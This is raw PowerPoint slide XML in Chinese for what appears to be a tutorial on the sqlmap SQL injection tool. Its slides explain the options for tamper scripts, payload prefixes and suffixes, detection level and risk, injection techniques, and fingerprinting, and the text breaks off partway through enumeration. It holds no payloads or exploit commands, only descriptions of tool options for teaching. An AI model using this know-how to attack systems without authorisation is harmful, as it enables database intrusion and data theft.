              <a:t>为此值</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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os=OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>强制后端的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>操作系统为这个值</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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prefix=PREFIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字符串前缀</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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suffix=SUFFIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字符串后缀</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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tamper=TAMPER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>使用给定的脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>S)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>篡改注入数据 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300676857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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4220579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Detection(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可以用来指定在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>盲注时如何解析和比较</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>响应页面的内容。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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level=LEVEL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行测试的等级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(1-5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，默认为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">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risk=RISK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行测试的风险</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(0-3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，默认为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">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string=STRING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>查询时有效时在页面匹配字符串</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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regexp=REGEXP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>查询时有效时在页面匹配正则表达式</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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text-only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>仅基于在文本内容比较网页 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9913505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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="3180294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Techniques(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可用于调整具体的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入测试。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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technique=TECH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入技术测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>默认 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>BEUST) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--time-sec=TIMESEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>响应的延迟时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>默认为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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union-cols=UCOLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>定列范围用于测试 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>查询注入 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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union-char=UCHAR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用于暴力猜解列数的字符 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291818016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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4220579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Fingerprint(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>指纹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">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f, --fingerprint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行检查广泛的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>版本指纹</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Enumeration(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>枚举</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
